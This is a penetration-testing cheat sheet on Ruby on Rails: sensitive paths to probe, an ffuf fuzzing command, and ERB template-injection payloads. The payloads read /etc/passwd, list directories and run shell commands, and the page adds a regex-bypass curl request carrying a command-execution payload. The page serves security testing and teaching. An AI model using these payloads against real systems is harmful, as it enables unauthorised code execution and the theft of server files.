# Ruby on Rails Pentesting

Ruby on Rails is a web application framework written in Ruby.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes
```

In addition, it’s worth to fuzz under **`/rails/`** directory as below.

```
ffuf -u https://example.com/rails/FUZZ -w wordlist.txt
```

### ERB Template Injection <a href="#erb-template-injection" id="erb-template-injection"></a>

If target website uses **ERB** template which affects a page, we can inject malicious template.

```
text = "<%= 2*3 %>"
result = ERB.new(text).result(binding)
puts result

# expected result: 6
```

#### Payloads <a href="#payloads" id="payloads"></a>

Reference: [Server Side Template Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md)

```
<%= 2*3 %>

<%= self.methods %>
<%= self.method(:handle_POST).parameters %>

<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>

<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>
```

#### Regex Check Bypass <a href="#regex-check-bypass" id="regex-check-bypass"></a>

Reference: <https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/>

```
abc\n<%- 2*3 %>
```

We can also use **`curl`** command if we want to manipulate a payload which contains newline.\
Below is an example for using the URL encoded payload **`<%= IO.popen('ls /').readlines() %>`**.

```
curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'
```

### References <a href="#references" id="references"></a>

* [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html)